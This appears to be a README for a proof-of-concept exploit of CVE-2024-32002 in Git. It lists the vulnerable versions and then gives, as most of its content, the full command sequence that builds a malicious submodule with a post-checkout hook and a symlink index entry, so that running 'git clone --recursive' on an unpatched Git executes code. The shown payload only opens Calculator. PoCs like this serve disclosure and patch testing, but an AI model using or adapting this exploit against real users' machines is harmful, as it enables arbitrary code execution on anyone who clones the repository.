A simple proof-of-concept that executes Calculator (macOS example only). When using git clone --recursive
command, this repo will also pull https://github.com/markuta/hooky, which contains a post-checkout
script. Mostly based on the commit fix t7406-submodule-update.sh file.
Note: Versions prior to
2.45.1
,2.44.1
,2.43.4
,2.42.2
,2.41.1
,2.40.2
, and2.39.4
are vulnerable.
git clone --recursive github.com/markuta/CVE-2024-32002
# Submodule repo (payload)
git init hooky
cd hooky
mkdir -p y/hooks
echo "open -a Calculator.app" > y/hooks/post-checkout
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m post-checkout
hook_repo_path="$(pwd)"
# Main repo
git init captain
git submodule add --name x/y "$hook_repo_path" A/modules/x
git commit -m add-submodule
printf .git >dotgit.txt
git hash-object -w --stdin <dotgit.txt >dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" >index.info
git update-index --index-info <index.info
git commit -m add-symlink
More info about the vulnerability can be found here and here.